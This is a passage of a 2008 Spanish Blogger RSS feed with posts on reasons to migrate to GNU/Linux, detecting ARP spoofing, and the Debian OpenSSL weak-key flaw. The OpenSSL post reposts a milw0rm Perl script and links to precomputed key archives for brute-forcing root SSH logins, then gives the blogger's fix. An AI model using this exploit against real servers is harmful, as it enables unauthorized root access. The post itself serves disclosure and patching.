GNU/Linux no tiene complicados requisitos para hacer cumplir las licencias. En una empresa con cientos o miles de ordenadores, será necesario tener a un gran numero de personal solo para asegurarnos de que todos los ordenadores están cumpliendo con las complejas condiciones de autorización de uso (EULAs) para Microsoft Windows, Microsoft Office y otras aplicaciones propietarias. Con GNU/Linux no hay temor a auditorías sorpresa con posibles sanciones por violación de licencias.&lt;br /&gt;&lt;br /&gt;9 - GNU/Linux es mucho más seguro con una muy baja tasa de infección por virus, troyanos, gusanos, software espía y otros códigos maliciosos. Esto se debe a que UNIX y todos sus descendientes (incluyendo GNU/Linux) fueron diseñados desde un principio con la seguridad en mente, en lugar de tratar de parchear graves fallos de seguridad cuando ys es demasiado tarde. Por ejemplo, los usuarios no habitúan a usar el sistema con permisos de administración, a fin de proteger los principales archivos del sistema. Incluso en el caso que la existencia de un código malicioso, este no poseería permisos suficientes para hacer mucho daño. Además un sólido firewall se incluye en las principales distribuciones y es activado por defecto. Otro factor a tener en cuenta es la libre disponibilidad del código fuente, lo que permite a miles de personas de todo el mundo poder buscar vulnerabilidades de seguridad.&lt;br /&gt;&lt;br /&gt;10 - GNU/Linux es altamente resistente a los fallos de sistema y raramente necesita reiniciar. Esto puede ser muy importante para las grandes organizaciones para las que unos minutos de tiempo de inactividad puede suponer un coste sustancial. La razón es que GNU/Linux ha sido diseñado desde cero para ser un sistema operativo estable y robusto, incorporando todo lo aprendido en 35 años de historia de UNIX.&lt;br /&gt;&lt;br /&gt;11 - Aunque el número y la variedad de programas para GNU/Linux aún no es tan grande como para el sistema operativo de Microsoft, ya existe una extensa selección y aumenta continuamente y cada vez más rápido a medida que más y más desarrolladores empiezan a crear programas para GNU/Linux. La mayoría de programas para GNU/Linux también son software libre y muchos de ellos tienen las mismas características y rinden igual o mejor que las ya existentes para Microsoft Windows. De hecho, los usuarios se encuentran a menudo con que todas las aplicaciones que necesitan están disponibles gratuitamente en Internet y que ya no necesitan comprar ningún software comercial.&lt;br /&gt;&lt;br /&gt;12 - Existe una numerosa variedad de distribuciones GNU/Linux (varios cientos), cada una con su propio conjunto único de características, pero básicamente todas compatibles entre sí. Esto permite a los usuarios seleccionar las versiones que mejor respondan a sus necesidades específicas. También significa que si un distribuidor de GNU/Linux dejará de operar, todavía habría muchos otros para elegir. Por otra parte, fomenta una sana competencia entre ellas, contribuyendo así a la mejora continuada de la calidad y el rendimiento de GNU/Linux. La elección parece abrumadora pero por lo general es difícil cometer un error seleccionando una de las más populares, como Red Hat, Susu o Ubuntu.&lt;br /&gt;&lt;br /&gt;13 - GNU/Linux cuenta con un alto grado de flexibilidad de configuración. Se puede lograr una alta personalización muy fácilmente y sin tener que modificar el código fuente. Es muy sencillo configurar GNU/Linux durante la instalación y optimizarlo para su uso como estación de trabajo, ordenador de escritorio, ordenador portátil, servidor web, servidor de base de datos, etc. Del mismo modo el aspecto y el comportamiento del escritorio, incluyendo iconos y menús puede ser configurado con un numero casi infinito de posibilidades y formas. Incluso puede hacerse parecido a Windows... Si esto no fuera suficiente, la capacidad de libre acceso al código fuente permite un grado de personalización "ilimitado".&lt;br /&gt;&lt;br /&gt;14 - GNU/Linux utiliza formatos abiertos y estándares. Estos son aquellos que se ajustan a las normas de la industria y que pueden ser utilizados por cualquier desarrollador de software para crear programas compatibles. Es el caso de los formatos para el procesamiento de textos, hojas de calculo y otros tipos de archivos. En comparación con los formatos privativos (véase el formato DOC), el uso de estándares elimina el problema del apego a las normas privadas, con la consecuente dificultad y coste a la hora de cambiar a otro software en un futuro. El uso de formatos abiertos permite al usuario tener el control total de sus datos, en particular en el caso de que el vendedor de software decida dar por obsoleta la versión del programa, obligando al usuario a migrar todos sus datos a la nueva versión, previo pago, por supuesto...&lt;br /&gt;&lt;br /&gt;15 - GNU/Linux es generalmente más rápido para un determinado conjunto de especificaciones de hardware. Esto es debido a una mayor optimización del código fuente.&lt;br /&gt;&lt;br /&gt;16 - GNU/Linux cuenta con un alto grado de compatibilidad con otros sistemas operativos. Por ejemplo, se puede escribir, leer, copiar, borrar y manipular los datos existentes en una partición para Microsoft Windows, actuar como servidor para una red que contenga clientes en Windows, formatear discos duros para el uso con Windows, e incluso ejecutar los programas de Windows directamente si fuera necesario. En comparación, los sistemas operativos de Microsoft no pueden acceder a particiones de disco que contengan otros sistemas, no pueden formatear discos duros para otros sistemas, etc, etc...&lt;br /&gt;&lt;br /&gt;17 - La ética y la moral se mantienen muy altas en el mundo GNU/Linux y en el resto del software libre debido a la gran apertura de su proceso de desarrollo y a la libre disponibilidad del código fuente. GNU/Linux nunca ha sido condenado en un tribunal por violación de leyes antimonopolio u otros delitos, ni ha tenido que pagar sanciones por la copia no autorizada de tecnología desarrollada por otras empresas. Las políticas gubernamentales antimonopolio regulan o rompen monopolios con el fin de promover la libre competencia. Los beneficios por alcanzar dicha competencia afectan a la economía y a la sociedad en su conjunto.&lt;br /&gt;&lt;br /&gt;18 - GNU/Linux reduce la necesidad de actualizar o sustituir hardware cuando se actualiza a una nueva versión. Esto se debe a que su código fuente es muy eficiente y compacto, lo que permite que funcione en computadoras antiguas que no son adecuadas para las versiones más recientes de Microsft Windows.&lt;br /&gt;&lt;br /&gt;19 - GNU/Linux es capaz de operar en una amplia variedad de plataformas y no solo se limita a equipos con procesadores Intel o AMD. Funciona perfectamente en una vasta variedad de equipos que van desde los superordenadores a los robots industriales, equipos médicos, teléfonos móviles (puede ejecutarse incluso en un reloj de pulsera)&lt;br /&gt;&lt;br /&gt;20 - GNU/Linux es una mejor elección para su uso en las instituciones académicas por una serie de razones. Entre ellas se encuentra el hecho de que no hay secretos (en marcado contraste con el software privativo), con lo que los estudiantes tendrán la oportunidad de estudiar como funcionan realmente los ordenadores en lugar de simplemente aprender a usarlos. Muchos profesores están convencidos de que es mucho más importante aprender los fundamentos prácticos de la informática que aprender el uso de aplicaciones especificas (como Microsoft Word o Power Point). Una de las razones es que los fundamentos prácticos de la informática seguirán siendo validos después de muchos años, mientras que las aplicaciones (especialmente las propietarias) están en constante cambio y los conocimientos adquiridos quedarán obsoletos en pocos tiempo.&lt;br /&gt;&lt;br /&gt;21 - Para los organismos gubernamentales, GNU/Linux permite la transparencia de los datos, ya que los almacena en formatos compatibles con toda la industria. Todo lo contrario al software comercial. Esta transparencia es importante para mantener una democracia efectiva. Esto permite a cualquier usuario acceder a los datos sin tener que comprar caros programas privativos. Por otra parte, mantenerlos en formatos estándar es mucho más seguro que hacerlo usando formatos propietarios.&lt;br /&gt;&lt;br /&gt;22 - En GNU/Linux hay muy pocas razones para temer la existencia de puertas traseras, en parte porque todo el código fuente está disponible para su inspección. Una puerta trasera es un método secreto para obtener acceso remoto a un ordenador. Existe una (muy justificada) preocupación por parte de los gobiernos y las corporaciones de que dichas puertas traseras se han insertado de forma encubierta en el software propietario, permitiendo a los desarrolladores y a otros gobiernos a acceder a sus datos confidenciales.&lt;br /&gt;&lt;br /&gt;23 - El uso y la promoción de GNU/Linux ayuda a fomentar una sana diversidad y aumento de competencia en toda la industria del software. Esa competencia puede promover el avance tecnológico, mejorar el rendimiento y disminuir los costes del software libre y del software propietario por igual. Tanto la teoría económica como los cientos de años de real experiencia en el mundo demuestran claramente que los monopolios no necesitan innovar, tienden a producir productos de mala calidad, inflan los precios y tienden a corromper el sistema político.&lt;br /&gt;&lt;br /&gt;24 - GNU/Linux y el software libre no solo han alcanzado, o en algunos casos superado al software privativo, sino que también desarrollan más rápido. Esta tendencia irá a más, dado que la demanda para este tipo de software sigue creciendo y cada vez más personas y organizaciones participan activamente en su desarrollo.&lt;br /&gt;&lt;br /&gt;25 - GNU/Linux ofrece la oportunidad de que los usuarios puedan contribuir al avance de la tecnología del software, debido a que el código fuente está disponible gratuitamente para ser estudiado, mejorado, ampliado y redistribuido. Un notable ejemplo de ello a nivel empresa ha sido IBM.&lt;br /&gt;&lt;br /&gt;26 - Existen en realidad más de 25 razones por las que organizaciones de todo el mundo están migrando a GNU/Linux. Un vigésimo sexto motivo es que con GNU/Linux no hay necesidad de desfragmentar los discos duros a diferencia de Windows. La fragmentación, que es la difusión de datos en lugares no contiguos puede reducir la eficacia del almacenamiento de datos y ralentizar el funcionamiento de la máquina. Desfragmentar no es difícil, pero puede ser una molestia tener que hacerlo periódicamente, y no es necesario si tienes un sistema operativo bien diseñado.&lt;br /&gt;&lt;br /&gt;He aqui las fuentes originales.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.bellevuelinux.org/reasons_to_convert.html"&gt;EN INGLES&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://historiasdequeso.blogspot.com/2008/05/25-razones-de-peso-para-migrar-gnulinux.html"&gt;EN ESPAÑOL&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-1136468021959011306?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/mas-de-25-razones-de-peso-para-migrar.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-2453516818253610880</guid><pubDate>Sat, 17 May 2008 18:09:00 +0000</pubDate><atom:updated>2008-05-17T13:47:09.131-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>ARP spoofing</category><title>Detectando ARP Spoofing</title><description>Estas son dos de las formas mas fáciles que e encontrado para detectar el arp spoofing, son utilizando las herramientas de arpwatch y arpalert. Las puedes instalar en Debian desde synaptic o bien.&lt;br /&gt;&lt;br /&gt;#apt-get install arpwatch &lt;br /&gt;#apt-get install arpalert&lt;br /&gt;&lt;br /&gt;ambos mandan alertas a /etc/log/syslog  puedes hacerte un script para mandar  las salidas a a otro archivo y también editar sus .conf  en /etc/arpalert y /etc/arpwatch.conf . Puedes ver los manuales oficiales de ellos.&lt;br /&gt;&lt;br /&gt;#man arpalert&lt;br /&gt;#man arpwatch&lt;br /&gt;&lt;br /&gt;Aquí esta la salida de syslog para ambos archivos arp mandándoles la orden que lean la interfaz eth2&lt;br /&gt;&lt;br /&gt;#arpalert -i eth2 {cambias la interfaz por la que te interese que este ala escucha}&lt;br /&gt;#arpalert -i eth2 &lt;br /&gt;&lt;br /&gt;#cat /var/log/syslog | grep arp&lt;br /&gt;&lt;br /&gt;May 17 13:12:40 zk kernel: Measured 4131621884 cycles TSC warp between CPUs, turning off TSC clock.&lt;br /&gt;May 17 13:43:59 zk arpalert: Auto selected device: eth1&lt;br /&gt;May 17 13:43:59 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface&lt;br /&gt;May 17 13:43:59 zk arpwatch: Running as uid=115 gid=121&lt;br /&gt;May 17 13:43:59 zk arpwatch: listening on eth1&lt;br /&gt;May 17 13:43:59 zk arpwatch: exiting&lt;br /&gt;May 17 13:44:16 zk arpalert: Auto selected device: eth1&lt;br /&gt;May 17 13:44:16 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)&lt;br /&gt;May 17 13:44:34 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface&lt;br /&gt;May 17 13:44:34 zk arpwatch: listening on eth1&lt;br /&gt;May 17 13:44:57 zk arpwatch: exiting&lt;br /&gt;May 17 14:41:04 zk arpalert: Selected device: eth2&lt;br /&gt;May 17 14:41:04 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)&lt;br /&gt;May 17 14:41:42 zk arpwatch: listening on eth2&lt;br /&gt;May 17 14:42:10 zk arpwatch: new station 192.168.0.11 0:38:de:34:46:g7 eth2&lt;br /&gt;May 17 14:42:10 zk arpwatch: new station 192.168.0.1 0:44:54:84:F3:c5 eth2&lt;br /&gt;May 17 14:43:13 zk arpwatch: bogon 1.15.54.18 0:44:4:34:14:c3 eth2&lt;br /&gt;May 17 14:55:14 zk arpwatch: bogon 1.15.54.18 0:44:45:y4:d3:56 eth2&lt;br /&gt;May 17 15:07:27 zk arpwatch: bogon 1.15.54.18 0:1e:45:y4:t3:56 eth2&lt;br /&gt;May 17 15:10:15 zk arpwatch: bogon 1.15.54.18 0:64:43:8a:1y:t6 eth2&lt;br /&gt;May 17 15:14:38 zk arpalert: Auto selected device: eth1&lt;br /&gt;May 17 15:14:38 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)&lt;br /&gt;May 17 15:25:16 zk arpwatch: bogon 1.15.54.18 0:44:74:w4:13:56 eth2&lt;br /&gt;May 17 15:30:36 zk arpwatch: bogon 1.15.54.18 0:d4:48:e4:13:56 eth2&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2453516818253610880?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/detectando-arp-spoofing.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-8311081754299793641</guid><pubDate>Thu, 15 May 2008 19:54:00 +0000</pubDate><atom:updated>2008-05-15T15:10:44.280-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>claves OpenSSL</category><category domain='http://www.blogger.com/atom/ns#'>Vulnerabilidad</category><title>[SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator</title><description>Vulnerabilidad crítica en las claves OpenSSL de Debian y las basadas en debian tambien.&lt;br /&gt;&lt;br /&gt;Ubuntu Ubuntu Linux 8.04 LTS sparc&lt;br /&gt;Ubuntu Ubuntu Linux 8.04 LTS powerpc&lt;br /&gt;Ubuntu Ubuntu Linux 8.04 LTS lpia&lt;br /&gt;Ubuntu Ubuntu Linux 8.04 LTS i386&lt;br /&gt;Ubuntu Ubuntu Linux 8.04 LTS amd64&lt;br /&gt;Ubuntu Ubuntu Linux 7.10 sparc&lt;br /&gt;Ubuntu Ubuntu Linux 7.10 powerpc&lt;br /&gt;Ubuntu Ubuntu Linux 7.10 lpia&lt;br /&gt;Ubuntu Ubuntu Linux 7.10 i386&lt;br /&gt;Ubuntu Ubuntu Linux 7.10 amd64&lt;br /&gt;Ubuntu Ubuntu Linux 7.04 sparc&lt;br /&gt;Ubuntu Ubuntu Linux 7.04 powerpc&lt;br /&gt;Ubuntu Ubuntu Linux 7.04 i386&lt;br /&gt;Ubuntu Ubuntu Linux 7.04 amd64&lt;br /&gt;Debian Linux 4.0 sparc&lt;br /&gt;Debian Linux 4.0 s/390&lt;br /&gt;Debian Linux 4.0 powerpc&lt;br /&gt;Debian Linux 4.0 mipsel&lt;br /&gt;Debian Linux 4.0 mips&lt;br /&gt;Debian Linux 4.0 m68k&lt;br /&gt;Debian Linux 4.0 ia-64&lt;br /&gt;Debian Linux 4.0 ia-32&lt;br /&gt;Debian Linux 4.0 hppa&lt;br /&gt;Debian Linux 4.0 arm&lt;br /&gt;Debian Linux 4.0 amd64&lt;br /&gt;Debian Linux 4.0 alpha&lt;br /&gt;Debian Linux 4.0&lt;br /&gt;&lt;br /&gt;&lt;a href="http://lists.debian.org/debian-security-announce/2008/msg00152.html"&gt;Anuncio en debian&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://milw0rm.com/exploits/5622"&gt;en MilwOrm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;the debian openssl issue leads that there are only 65.536 possible ssh &lt;br /&gt;keys generated, cause the only entropy is the pid of the process &lt;br /&gt;generating the key.&lt;br /&gt;&lt;br /&gt;This leads to that the following perl script can be used with the &lt;br /&gt;precalculated ssh keys to brute force the ssh login. It works if such a &lt;br /&gt;keys is installed on a non-patched debian or any other system manual &lt;br /&gt;configured to.&lt;br /&gt;&lt;br /&gt;On an unpatched system, which doesn't need to be debian, do the following:&lt;br /&gt;&lt;br /&gt;keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/&lt;br /&gt;&lt;br /&gt;1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2&lt;br /&gt;     http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2&lt;br /&gt;&lt;br /&gt;2. Extract it to a directory&lt;br /&gt;&lt;br /&gt;3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 &lt;br /&gt;Bits, generated on an upatched debian (this is the key this exploit will &lt;br /&gt;break)&lt;br /&gt;&lt;br /&gt;4. Run the perl script and give it the location to where you extracted &lt;br /&gt;the bzip2 mentioned.&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;my $keysPerConnect = 6;&lt;br /&gt;unless ($ARGV[1]) {&lt;br /&gt;   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";&lt;br /&gt;   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";&lt;br /&gt;   print "By mm@deadbeef.de\n";&lt;br /&gt;   exit 0;&lt;br /&gt;}&lt;br /&gt;chdir($ARGV[0]);&lt;br /&gt;opendir(A, $ARGV[0]) || die("opendir");&lt;br /&gt;while ($_ = readdir(A)) {&lt;br /&gt;   chomp;&lt;br /&gt;   next unless m,^\d+$,;&lt;br /&gt;   push(@a, $_);&lt;br /&gt;   if (scalar(@a) &gt; $keysPerConnect) {&lt;br /&gt;      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i &lt;br /&gt;".$_ } @a)." ".$ARGV[1]);&lt;br /&gt;      @a = ();&lt;br /&gt;   }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;5. Enjoy the shell after some minutes (less than 20 minutes)&lt;br /&gt;&lt;br /&gt;Regards,&lt;br /&gt;Markus Mueller&lt;br /&gt;mm@deadbeef.de&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2008-05-15]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Yo en mi sistema hice lo siguiente:&lt;br /&gt;&lt;br /&gt;# rm /etc/ssh/ssh_host_*&lt;br /&gt;&lt;br /&gt;Y después las he regenerado con:&lt;br /&gt;&lt;br /&gt;# dpkg-reconfigure -plow openssh-server&lt;br /&gt;&lt;br /&gt;Y todo perfecto.&lt;br /&gt;&lt;br /&gt;Esto lo leei en un post de &lt;a href="http://www.esdebian.org/article.php/20080513140417785"&gt;haplo&lt;/a&gt; en &lt;a href="http://www.esdebian.org"&gt;esDebian&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8311081754299793641?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/security-dsa-1571-1-new-openssl.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-4078561000593417530</guid><pubDate>Wed, 07 May 2008 04:23:00 +0000</pubDate><atom:updated>2008-05-07T15:25:56.715-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>video</category><category domain='http://www.blogger.com/atom/ns#'>protector solar</category><category domain='http://www.blogger.com/atom/ns#'>Reflexion</category><title>Excelente video, esta para llorar.</title><description>Excelente vídeo este vídeo tiene mas de medio año que lo avía visto y hoy no se porque me acorde del, y decidí ponerlo en el blog para que la gente lo pudiera apreciar también,  espero les guste tanto como a mi.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/YDRId6QmNTA&amp;hl=es"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/YDRId6QmNTA&amp;hl=es" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;otro en link al mismo video.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/DgzHrI61CuM&amp;hl=es"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/DgzHrI61CuM&amp;hl=es" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://mx.youtube.com/watch?v=DgzHrI61CuM"&gt;VIDEO AQUI&lt;/a&gt; y &lt;a href="http://mx.youtube.com/watch?v=YDRId6QmNTA"&gt;AQUI&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-4078561000593417530?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/excelente-video-esta-para-llorar.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-6176293444677467928</guid><pubDate>Mon, 05 May 2008 21:35:00 +0000</pubDate><atom:updated>2008-05-05T16:39:43.103-05:00</atom:updated><title>No mames .....</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_OdUSaKBFEPk/SB9-Vv3nnaI/AAAAAAAAAI4/fW914HY0SB8/s1600-h/Pantallazo.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_OdUSaKBFEPk/SB9-Vv3nnaI/AAAAAAAAAI4/fW914HY0SB8/s400/Pantallazo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5197011407100943778" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;HAAAAAA NO MAMES SIEMPREEEEE.............&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6176293444677467928?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/no-mames.html</link><author>noreply@blogger.com (zerial killer)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_OdUSaKBFEPk/SB9-Vv3nnaI/AAAAAAAAAI4/fW914HY0SB8/s72-c/Pantallazo.png' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>3</thr:total></item></channel></rss>